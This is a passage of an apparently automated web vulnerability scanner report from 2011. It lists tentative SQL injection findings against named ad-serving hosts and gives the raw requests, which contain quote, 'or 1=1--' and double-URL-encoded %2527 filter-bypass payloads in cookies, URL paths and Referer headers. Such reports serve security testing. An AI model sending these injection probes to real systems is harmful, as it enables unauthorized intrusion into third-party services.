#mPD!-I0R!$Khv!0L[#!%Bbn~!#W(2)HM3<!wVd.!%l4g!!j:k!'H85~~~~~<n!/j<n<(e!!!#G!#mPG!-I0R!$Khv!0L[#!%Bbn~!#W(2)HM3<!wVd.!%l4g!!j:k!'H85~~~~~<n!/j<n<(e!!!#G!#mPJ!-I0R!$Khv!0L[#!%Bbn~!#W(2)HM3<!wVd.!%l4g!!j:k!'H85~~~~~<n!/j<n<(e!!!#G!!iIx!-nK4!$Uo!!0ER1!%G-L!!!!$!?5%!%R8]5!ZZ<)!'%'p!'MyD~~~~~~<miT1~M.jTN!#p!r!-I0R!$Khv!0L[#!%Bbn~!#W(2)HM3<!wVd.!%l4g!!j:k!'H85~~~~~<n!/j<n!Ey!!.vL!#p!u!-I0R!$Khv!0L[#!%Bbn~!#W(2)HM3<!wVd.!%l4g!!j:k!'H85~~~~~<n!/j<n!Ey!!.vL"; lifb=ck5e5rukLFjg_W2; bh="b!!!%1!!$ha!!?fS<mZsO!!'iQ!!!!#<htUa!!*$n!!!!#<htUa!!*10!!!!%<m#np!!,D(!!!!'<m#np!!-?2!!!!*<m#np!!-G2!!!!$<lise!!-yu!!!!%<hu%6!!.+B!!!!%<hu%:!!0!j!!!!)<m#np!!0+@!!!!$<jb`/!!04a!!!!$<jb`/!!1CD!!!!'<mjPP!!1Mv!!!!#<hfYB!!1SP!!!!$<ie@u!!2(x!!!!(<m#np!!2)5!!!!#<m#np!!4<u!!!!)<m#np!!4d6!!!!#<jbN=!!5i*!!!!#<himW!!7gK!!!!#<lm]6!!<@x!!!!%<lSWC!!<P5!!!!#<m#np!!<P6!!!!#<m#np!!?VS!!DPb<lQiA!!C5(!!!!#<m#np!!J>N!!!!#<k2yx!!KNF!!ErC<k0fB!!L(*!!!!#<h67=!!L(^!!!!'<m8qE!!L_w!!!!+<m8qE!!MZU!!!!#<lQiC!!MfS!!!!$<mj`y!!Mr(!!ErC<k0fB!!ObA!!!!$<m#np!!ObV!!!!$<m#np!!OgU!!!!(<m#np!!T[J!!!!$<lm]6!!Z-E!!!!$<m#np!!Z-G!!!!$<m#np!!Z-L!!!!$<m#np!!Zw`!!!!%<m#np!!Zwb!!!!'<m#np!!`Yp!!!!#<htUb!!fP+!!!!#<k`g7!!g[x!!!!#<m#np!!hqJ!!!!#<lP]!!!iEC!!!!'<m#np!!iEb!!!!)<m#np!!i_9!!!!$<m#np!!jD6!!!!#<lja'!!mDJ!!!!#<lQq8!!p.C!!!!$<n!1B!!qOs!!!!#<htUb!!qOt!!!!#<htUb!!qOu!!!!#<htUb!!qu+!!!!$<lmXb!!r-X!!!!#<iMv0!!s6R!!!!#<htUb!!s9!!!!!#<jc#c!!ti>!!!!#<m!S_!!u[u!!!!(<lVbU!!utd!!!!(<lVbU!!utl!!!!#<lSD*!!uto!!!!#<lVbU!!uu)!!!!%<lSVZ!!v:e!!!!(<m#np!!y]X!!!!#<k11E!!ys+!!!!$<h2ED!#!vF!!!!#<m*gT!#!vL!!!!#<m*gT!###G!!!!#<lP[k!###_!!!!#<j?lI!##lo!!!!#<jbO@!#')-!!!!#<k2yx!#*<R!!!!%<ln'v!#*VS!!!!#<jLPe!#+]S!!!!(<m#np!#,##!!!!'<lSWC!#-vv!!!!$<iC/K!#.dO!!!!+<m8qE!#/:a!!!!$<lmXf!#/G2!!!!$<m#np!#/G<!!!!$<m#np!#/GO!!!!$<m#np!#/j>!!!!#<m*gT!#/yX!!!!#<k2yx!#0$b!!!!%<hu%0!#15#!!ErC<k0fB!#15$!!ErC<k0fB!#17@!!?fS<mZsO!#2+>!!!!'<lS0M!#2Ic!!!!$<mj`x!#2`q!!!!#<jc#g!#2mR!!!!$<lEIO!#3(M!!!!#<m*gT!#3>,!!!!#<lmWu!#3>9!!!!#<lxx`!#3>C!!!!#<lxx]!#3>M!!!!#<lmdr!#3pS!!!!$<lR(Q!#3pv!!!!$<lP]%!#5(U!!!!#<myyA!#5(X!!!!#<jLPe!#5(Y!!!!#<l.yn!#5(f!!!!#<kI4S!#5m!!!!!#<k2yx!#5mH!!!!#<k2yx!#6Ty!!!!#<myyA!#7(x!!!!*<m#np!#8*^!!!!#<mC=k!#8.'!!!!$<lmXe!#8:i!!!!#<jc#c!#8?7!!!!$<lmXb!#8A2!!!!#<k11E!#<T3!!!!#<jbNC!#@7F!!!!#<m8qE!#@wb!!!!#<m*gT!#CC>!!!!#<lS@,!#F1H!!!!'<lS0M!#FGA!!!!%<ln'v!#Fu6!!!!$<lm]6!#Fw_!!!!%<ln'v!#I=D!!!!,<m915!#Ic1!!!!$<lmXc!#Ie+!!!!#<myyA!#K?%!!!!#<l8V)!#Kbb!!!!#<jLP/!#LI/!!!!$<mjPP!#LI0!!!!#<k2yw!#LaM!!!!#<m,_i!#MAX!!!!#<mjra!#MTC!!!!-<m9Vb!#MTF!!!!-<m9Vb!#MTH!!!!-<m9Vb!#MTI!!!!-<m9Vb!#MTJ!!!!-<m9Vb!#Mub!!!!#<myyA!#NjS!!!!#<lI#*!#O4F!!!!#<m*gT!#O4I!!!!#<m*gT!#O4M!!!!#<m*gT!#O>M!!DPb<lQiA!#OAV!!DPb<lQiA!#OAW!!DPb<lQiA!#OC2!!!!#<l/M+!#OH-!!!!#<m*gT!#PqQ!!!!#<lI#)!#PrV!!!!$<myyF!#Q*7!!!!#<n!1O!#Q+o!!!!+<m8qE!#Q<o!!!!#<mC=k!#Qh8!!!!#<l.yn!#R!r!!!!#<myyA!#RSx!!!!#<m*gT!#Ri/!!!!+<m8qE!#Rij!!!!+<m8qE!#SCj!!!!%<m*l:!#SCk!!!!(<m8qG!#SUp!!!!(<m#np!#SVp!!!!#<m*gT!#T#d!!!!#<k2yx!#T,d!!!!#<lR(Q!#TlE!!!!$<lmXe!#TnE!!!!*<m9Vb!#Tnp!!!!$<lmXb!#UDQ!!!!-<m9Vb!#UJ4!!!!#<m*gT!#UJ9!!!!#<m*gT!#UL(!!!!%<lQW%!#V7#!!!!#<myyA!#VYG!!!!(<mCr1!#V]o!!!!%<mCr1!#V]u!!!!'<mCr1!#V]v!!!!'<mCr1!#W,W!!!!'<mCr1!#W-B!!!!%<mCr1!#W-^!!!!%<mCr1!#W.*!!!!'<mCr1!#W.B!!!!#<m*XR!#W.Q!!!!'<mCr1!#W/5!!!!'<mCr1!#W/A!!!!'<mCr1!#W/J!!!!$<m:Vy!#W^8!!!!#<jem(!#Wb2!!DPb<lQiA!#X)y!!!!#<jem(!#X:Z!!!!#<m*gT!#X]+!!!!'<kdT!!#Zb%!!!!#<m#np!#ZbF!!!!#<m#np!#ZbM!!!!#<m#np!#ZhT!!!!*<m#np!#Zmf!!!!$<kT`F!#[25!!!!%<lhqW!#[L>!!!!%<lise!#]%`!!!!$<m*Yw!#]Z#!!!!#<m#np!#^$?!!!!#<m*gT!#^0$!!!!(<m#np!#^0%!!!!(<m#np!#^d6!!!!$<m*Yw!#_+6!!!!#<m*gT!#_0t!!!!%<kTb(!#_1L!!!!#<m*gT!#`T=!!!!#<m#np!#`T>!!!!#<m#np!#`TF!!!!#<m#np!#`TG!!!!#<m#np!#`TJ!!!!#<m#np!#`TK!!!!#<m#np!#aCq!!!!'<lisd!#aG>!!!!+<m8qE!#aM'!!!!#<kp_p!#aly!!!!#<m*gT!#av4!!!!$<m!TH!#b<d!!!!#<jLPi!#b<e!!!!#<l.yn!#b<g!!!!#<kI4S!#b<i!!!!#<jLPe!#b<j!!!!#<jHAu!#b?A!!!!#<l.x@!#b`>!!!!#<jc#Y!#b`?!!!!#<jc#Y!#b`@!!!!#<jc#Y!#cC!!!!!#<ie2`!#dCU!!!!#<m*gT!#e)`!!!!#<m:W!!#e@W!!!!#<k_2)!#eVe!!!!#<jHAu!#elE!!!!#<k3!!!#f$g!!!!%<mh@e!#fBj!!!!)<m#np!#fBk!!!!)<m#np!#fBm!!!!)<m#np!#fBn!!!!)<m#np!#fE=!!!!'<lQj,!#fG+!!!!)<m#np!#fJ/!!!!#<gj@R!#fdu!!!!#<k2yx!#fpW!!!!#<l/JY!#fpX!!!!#<l/JY!#fpY!!!!#<l/JY!#g/7!!!!(<m#np!#gC:!!!!#<lmdV!#gHO!!!!#<m*gT!#gPp!!!!#<m!TX!#gRx!!!!#<htU3!#g]5!!!!#<lm]?!#g]7!!!!#<l.yn!#g]9!!!!#<kjl4!#gq`!!!!#<m*gT!#h.N!!!!#<kL2n!#jRq!!!!#<mZv)!#jS>!!!!#<k_Jy!#mP5!!!!$<lise!#mP6!!!!$<lise!#ndJ~~!#ndP!!!!$<lP]'!#ne$!!!!$<lP]'!#p7'!!!!#<myyA!#p9d!!!!#<lj09!#pD8!!!!+<n!/j!#q?L!!!!#<mjrb!#rJ)!!!!#<mn#6!#sXy!!!!#<n!/o!#so_!!!!#<mjPP!#sx#!!!!3<m9Vd!#t?S!!!!#<m`73"

Response 2

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 15:04:17 GMT
Server: YTS/1.18.4
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Set-Cookie: BX=/; path=/; expires=Mon, 01-Mar-2004 00:00:00 GMT
X-RightMedia-Hostname: ad0118.rm.ac4
Cache-Control: no-store
Last-Modified: Mon, 14 Feb 2011 15:04:17 GMT
Pragma: no-cache
Content-Length: 1103
Content-Type: application/x-javascript
Age: 0
Proxy-Connection: close

document.write('<iframe allowtransparency=\"true\" scrolling=\"no\" marginwidth=\"0\" marginheight=\"0\" frameborder=\"0\" height=\"90\" width=\"728\" src=\"http://adserving.cpxinteractive.com/iframe3?INNLAIrDDgAuX3cAAAAAAHRtHgAAAAAAAwAAAAYAAAAAAP8AAAACCvNjGwAAAAAAPBsoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADWRAgAAAAAAAIAAgAAAAAAAAAAAAAAAAABAPBxXtORPwAAAAAAAAAAAQCQaJ21nT8AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAC15Rm18SiiCfELaflJ4lS0Dsptv5K.DRbGbhwkAAAAAA==,,http%3A%2F%2Ftag.admeld.com%2Fad%2Fiframe%2F216%2Fus%2F728x90%2Fnews%3Ft%3D1297647385452%26tz%3D360%26hu%3D%26ht%3Djs%26hp%3D0%26url%3Dhttp%253a%252f%252fwww.independent.co.uk%252fnews%252fworld%252fafrica%252fis-the-army-tightening-its-grip-on-egypt-2213849.html%26refer%3D,Z%3D728x90%26s%3D967562%26_salt%3D946042951%26B%3D10%26r%3D014513687%2520or%25201%253d2--%2520,b1863a78-384b-11e0-b4dc-001b24936094\"></iframe>');
var rm_data = new Object();
rm_data.creative_id = 7823150;
rm_data.offer_type = 31;
rm_data.entity_id = 362142;
if (window.rm_crex_data) {rm_crex_data.push(7823150);}

1.2. http://ads.asp.net/a.aspx [%24CC cookie]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://ads.asp.net
Path:   /a.aspx

Issue detail

The %24CC cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the %24CC cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /a.aspx?ZoneID=456&Task=Get&IFR=False&Browser=NETSCAPE4&PageID=69670&SiteID=3&Random=1297695837986 HTTP/1.1
Host: ads.asp.net
Proxy-Connection: keep-alive
Referer: http://ads.asp.net/a.aspx?ZoneID=443&Task=Get&PageID=77047&SiteID=3
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=rqfwaq45hoecdc55iodweli3; %24SPIDER=False; %24CC=US'; %24RC=TX; %24MC=0

Response 1

HTTP/1.1 500 Internal Server Error
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Mon, 14 Feb 2011 15:08:45 GMT
Content-Length: 4587

<html>
<head>
<title>Object reference not set to an instance of an object.</title>
<style>
body {font-family:"Verdana";font-weight:normal;font-size: .7em;color:black;}
...[SNIP]...
</b>An unhandled exception occurred during the execution of the current web request. Please review the stack trace for more information about the error and where it originated in the code.

<br>
...[SNIP]...

Request 2

GET /a.aspx?ZoneID=456&Task=Get&IFR=False&Browser=NETSCAPE4&PageID=69670&SiteID=3&Random=1297695837986 HTTP/1.1
Host: ads.asp.net
Proxy-Connection: keep-alive
Referer: http://ads.asp.net/a.aspx?ZoneID=443&Task=Get&PageID=77047&SiteID=3
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=rqfwaq45hoecdc55iodweli3; %24SPIDER=False; %24CC=US''; %24RC=TX; %24MC=0

Response 2

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: application/x-javascript; charset=utf-8
Server: Microsoft-IIS/7.0
P3P: CP="NOI DSP COR NID ADMa OPTa OUR NOR"
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Mon, 14 Feb 2011 15:08:46 GMT
Content-Length: 1449

document.write('<!-- Begin - Site: TheLounge Network Zone: TL_RON_728_ITPro -->\r<script language=\"javascript\" type=\"text/javascript\">\r<!--\rvar browName = navigator.appName;\rvar SiteID = 6;\r
...[SNIP]...

1.3. http://ads.asp.net/a.aspx [%24RC cookie]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://ads.asp.net
Path:   /a.aspx

Issue detail

The %24RC cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the %24RC cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /a.aspx?ZoneID=456&Task=Get&IFR=False&Browser=NETSCAPE4&PageID=69670&SiteID=3&Random=1297695837986 HTTP/1.1
Host: ads.asp.net
Proxy-Connection: keep-alive
Referer: http://ads.asp.net/a.aspx?ZoneID=443&Task=Get&PageID=77047&SiteID=3
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=rqfwaq45hoecdc55iodweli3; %24SPIDER=False; %24CC=US; %24RC=TX'; %24MC=0

Response 1

HTTP/1.1 500 Internal Server Error
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Mon, 14 Feb 2011 15:08:55 GMT
Content-Length: 4587

<html>
<head>
<title>Object reference not set to an instance of an object.</title>
<style>
body {font-family:"Verdana";font-weight:normal;font-size: .7em;color:black;}
...[SNIP]...
</b>An unhandled exception occurred during the execution of the current web request. Please review the stack trace for more information about the error and where it originated in the code.

<br>
...[SNIP]...

Request 2

GET /a.aspx?ZoneID=456&Task=Get&IFR=False&Browser=NETSCAPE4&PageID=69670&SiteID=3&Random=1297695837986 HTTP/1.1
Host: ads.asp.net
Proxy-Connection: keep-alive
Referer: http://ads.asp.net/a.aspx?ZoneID=443&Task=Get&PageID=77047&SiteID=3
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=rqfwaq45hoecdc55iodweli3; %24SPIDER=False; %24CC=US; %24RC=TX''; %24MC=0

Response 2

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: application/x-javascript; charset=utf-8
Server: Microsoft-IIS/7.0
P3P: CP="NOI DSP COR NID ADMa OPTa OUR NOR"
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Mon, 14 Feb 2011 15:08:56 GMT
Content-Length: 1449

document.write('<!-- Begin - Site: TheLounge Network Zone: TL_RON_728_ITPro -->\r<script language=\"javascript\" type=\"text/javascript\">\r<!--\rvar browName = navigator.appName;\rvar SiteID = 6;\r
...[SNIP]...

1.4. http://c5.zedo.com//ads2/k/889025/4381/172/0/305004506/305004506//0/305/916//1000003/i.js [REST URL parameter 11]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://c5.zedo.com
Path:   //ads2/k/889025/4381/172/0/305004506/305004506//0/305/916//1000003/i.js

Issue detail

The REST URL parameter 11 appears to be vulnerable to SQL injection attacks. The payloads 42801041%20or%201%3d1--%20 and 42801041%20or%201%3d2--%20 were each submitted in the REST URL parameter 11. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET //ads2/k/889025/4381/172/0/305004506/305004506//0/305/91642801041%20or%201%3d1--%20//1000003/i.js HTTP/1.1
Host: c5.zedo.com
Proxy-Connection: keep-alive
Referer: http://c5.zedo.com/jsc/c5/ff2.html?n=305;c=4506/2941/1;s=916;d=17;w=720;h=300
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ZEDOIDA=INmz6woBADYAAHrQ5V4AAACH~010411; __qca=P0-2130372027-1295906131971; ZEDOIDX=29; FFAbh=766B305,20|320_1#365; ZFFAbh=749B826,20|1643_1#382Z1483_768#365; FFCap=1463B1219,174796:933,196008,151716:305,195657:1211,145132,135220:1063,129348,129351:196636,196635:196641,196640:196643,196640:196645,196644:196641,196640:951,125046,131022,131021:196645,196644:196642,196640:1025,196206,196207,95694|1,24,1:0,40,1:0,40,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,27,1:0,26,1:0,27,1:14,26,1:14,26,1:0,27,1:0,27,1:0,27,1:0,27,1:0,40,1:0,42,3:0,40,1; FFgeo=5386156; PI=h884566Za747317Zc305004506%2C305004506Zs916Zt143; ZCBC=1; FFChanCap=1463B1219,48#878391,19#878390,1#706985#736041#704705,20#878399,16#706985:1083,8#647871,7#740741#668673#648477:1099,2#702971:1174,2#686461,1#735987#661512#735993#661522#663188:1063,1#732560#653259#768798#835748#768794#834936:1194,1#765521#795614,2#758201#684991#758198#677970:951,7#538777#851294#538760#538779#877543#877544,2#776116#653213#562813#711378#776117#775740#864240#580302#653224#649953,11#538792:1190,2#684982,1#751890#675823#675820:1025,1#775786#834321#775734#775797#775796#834305#834300#835846#883311#835844#883313#835850:1120,1#619977|0,1,1:0,1,1:0,1,1:1,1,1:2,1,1:0,11,1:0,11,1:1,6,1:0,12,7:0,7,2:0,6,1:0,17,1:0,24,1:0,25,2:0,24,1:0,25,2:0,24,1:0,24,1:1,24,1:0,25,2:0,24,1:1,24,1:0,24,1:0,24,1:0,24,1:0,24,1:0,25,1:0,25,1:0,25,1:0,25,1:0,26,1:0,26,1:0,26,1:1,26,1:44,26,1:32,26,1:0,26,1:0,27,2:0,26,1:2,26,1:0,26,1:0,26,1:0,26,1:1,26,1:0,27,2:0,26,1:0,27,1:0,36,1:0,38,3:0,36,1:0,36,1:0,40,1:0,41,2:0,40,1:0,40,1:0,40,1:0,41,2:0,41,2:2,40,1:0,40,1:2,40,1:0,40,1:3,40,1:0,42,1; FFcat=305,4506,17:1120,1,9; FFad=0:0

Response 1

HTTP/1.1 200 OK
Server: ZEDO 3G
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Vary: Accept-Encoding
Content-Type: application/x-javascript
X-Varnish: 1729344673
Cache-Control: max-age=2592000
Expires: Wed, 16 Mar 2011 14:42:47 GMT
Date: Mon, 14 Feb 2011 14:42:47 GMT
Connection: close
Content-Length: 2165


var zzDate = new Date();
var zzWindow;
var zzURL;
if (typeof zzCustom =='undefined'){var zzIdxCustom ='';}
else{var zzIdxCustom = zzCustom;}
if (typeof zzTrd =='undefined'){var zzIdxTrd ='';}
e
...[SNIP]...
</A>")








Request 2

GET //ads2/k/889025/4381/172/0/305004506/305004506//0/305/91642801041%20or%201%3d2--%20//1000003/i.js HTTP/1.1
Host: c5.zedo.com
Proxy-Connection: keep-alive
Referer: http://c5.zedo.com/jsc/c5/ff2.html?n=305;c=4506/2941/1;s=916;d=17;w=720;h=300
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ZEDOIDA=INmz6woBADYAAHrQ5V4AAACH~010411; __qca=P0-2130372027-1295906131971; ZEDOIDX=29; FFAbh=766B305,20|320_1#365; ZFFAbh=749B826,20|1643_1#382Z1483_768#365; FFCap=1463B1219,174796:933,196008,151716:305,195657:1211,145132,135220:1063,129348,129351:196636,196635:196641,196640:196643,196640:196645,196644:196641,196640:951,125046,131022,131021:196645,196644:196642,196640:1025,196206,196207,95694|1,24,1:0,40,1:0,40,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,27,1:0,26,1:0,27,1:14,26,1:14,26,1:0,27,1:0,27,1:0,27,1:0,27,1:0,40,1:0,42,3:0,40,1; FFgeo=5386156; PI=h884566Za747317Zc305004506%2C305004506Zs916Zt143; ZCBC=1; FFChanCap=1463B1219,48#878391,19#878390,1#706985#736041#704705,20#878399,16#706985:1083,8#647871,7#740741#668673#648477:1099,2#702971:1174,2#686461,1#735987#661512#735993#661522#663188:1063,1#732560#653259#768798#835748#768794#834936:1194,1#765521#795614,2#758201#684991#758198#677970:951,7#538777#851294#538760#538779#877543#877544,2#776116#653213#562813#711378#776117#775740#864240#580302#653224#649953,11#538792:1190,2#684982,1#751890#675823#675820:1025,1#775786#834321#775734#775797#775796#834305#834300#835846#883311#835844#883313#835850:1120,1#619977|0,1,1:0,1,1:0,1,1:1,1,1:2,1,1:0,11,1:0,11,1:1,6,1:0,12,7:0,7,2:0,6,1:0,17,1:0,24,1:0,25,2:0,24,1:0,25,2:0,24,1:0,24,1:1,24,1:0,25,2:0,24,1:1,24,1:0,24,1:0,24,1:0,24,1:0,24,1:0,25,1:0,25,1:0,25,1:0,25,1:0,26,1:0,26,1:0,26,1:1,26,1:44,26,1:32,26,1:0,26,1:0,27,2:0,26,1:2,26,1:0,26,1:0,26,1:0,26,1:1,26,1:0,27,2:0,26,1:0,27,1:0,36,1:0,38,3:0,36,1:0,36,1:0,40,1:0,41,2:0,40,1:0,40,1:0,40,1:0,41,2:0,41,2:2,40,1:0,40,1:2,40,1:0,40,1:3,40,1:0,42,1; FFcat=305,4506,17:1120,1,9; FFad=0:0

Response 2

HTTP/1.1 200 OK
Server: ZEDO 3G
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Vary: Accept-Encoding
Content-Type: application/x-javascript
X-Varnish: 269055336
Cache-Control: max-age=2591996
Expires: Wed, 16 Mar 2011 14:42:43 GMT
Date: Mon, 14 Feb 2011 14:42:47 GMT
Connection: close
Content-Length: 2529


var zzDate = new Date();
var zzWindow;
var zzURL;
if (typeof zzCustom =='undefined'){var zzIdxCustom ='';}
else{var zzIdxCustom = zzCustom;}
if (typeof zzTrd =='undefined'){var zzIdxTrd ='';}
e
...[SNIP]...
</A>")






var zzllnw = new Image();
var zzxads = new Image();
if ((Math.floor(Math.random()*1000000)%9)==0) {
zzllnw.src='http://l1.zedo.com/log/p.gif?a=27536;c=101000000;x=3840;n=101;e=i;i=0;s=0;z='+Math.random()+';logdomain=l1.zedo.com';
zzxads.src='http://xads.zedo.com/ads2/p/l?a=27535;c=101000000;x=3840;n=101;e=i;i=0;s=0;z='+Math.random()+';logdomain=l1.zedo.com';
}




1.5. http://googleads.g.doubleclick.net/pagead/ads [Referer HTTP header]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://googleads.g.doubleclick.net
Path:   /pagead/ads

Issue detail

The Referer HTTP header appears to be vulnerable to SQL injection attacks. A single quote was submitted in the Referer HTTP header, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of the Referer HTTP header as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request 1

GET /pagead/ads?client=ca-pub-1303991290747972&output=js&lmt=1297668925&num_ads=2&skip=0&channel=wide_bottom&region=s1%20s2&ad_type=text&ea=0&oe=utf8&feedback_link=on&flash=10.2.154&hl=en&url=http%3A%2F%2Fwww.dailymail.co.uk%2Fnews%2Farticle-1356403%2FNHS-fertility-doctor-Charles-Kingsland-sends-UK-couples-Cyprus-illegal-treatment.html&adsafe=high&dt=1297647325454&shv=r20101117&jsv=r20110208&saldr=1&correlator=1297647325650&frm=0&adk=213452801&ga_vid=1459858550.1297647324&ga_sid=1297647324&ga_hid=1647426838&ga_fc=1&u_tz=-360&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=1096&bih=1010&fu=0&ifi=1&dtd=211 HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?hl=en&q=%2527
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9|2575106/466721/15017,2299144/808253/15017,1984865/715155/15016,1139856/660902/15016,2558160/1040396/15016,1359549/451737/15015,2206715/621812/15013,189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc

Response 1

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/javascript; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Mon, 14 Feb 2011 15:15:28 GMT
Server: cafe
Cache-Control: private, x-gzip-ok=""
X-XSS-Protection: 1; mode=block
Content-Length: 2906

{

var google_ads = new Array();
var google_ad;
var google_radlinks = new Array();
var google_radlink;
var google_info = new Object();
google_ad = new Object();
google_ad.n = 1;
google_ad.type = "te
...[SNIP]...
or%2520attorneys%2522%26";
google_ad.visible_url = "PassagesMalibu.com";
google_ad.line1 = "Private Drug Rehab";
google_ad.line2 = "Non-12 Step Addiction Cure Center";
google_ad.line3 = "Known for Exceptional Cure Rate.";
google_ad.regionname = "";
google_ads[1] = google_ad;
google_info.feedback_url = "http://www.google.com/url?ct\x3dabg\x26q\x3dhttps://www.google.com/adsense/support/bin/request.py%3F
...[SNIP]...

Request 2

GET /pagead/ads?client=ca-pub-1303991290747972&output=js&lmt=1297668925&num_ads=2&skip=0&channel=wide_bottom&region=s1%20s2&ad_type=text&ea=0&oe=utf8&feedback_link=on&flash=10.2.154&hl=en&url=http%3A%2F%2Fwww.dailymail.co.uk%2Fnews%2Farticle-1356403%2FNHS-fertility-doctor-Charles-Kingsland-sends-UK-couples-Cyprus-illegal-treatment.html&adsafe=high&dt=1297647325454&shv=r20101117&jsv=r20110208&saldr=1&correlator=1297647325650&frm=0&adk=213452801&ga_vid=1459858550.1297647324&ga_sid=1297647324&ga_hid=1647426838&ga_fc=1&u_tz=-360&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=1096&bih=1010&fu=0&ifi=1&dtd=211 HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?hl=en&q=%2527%2527
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
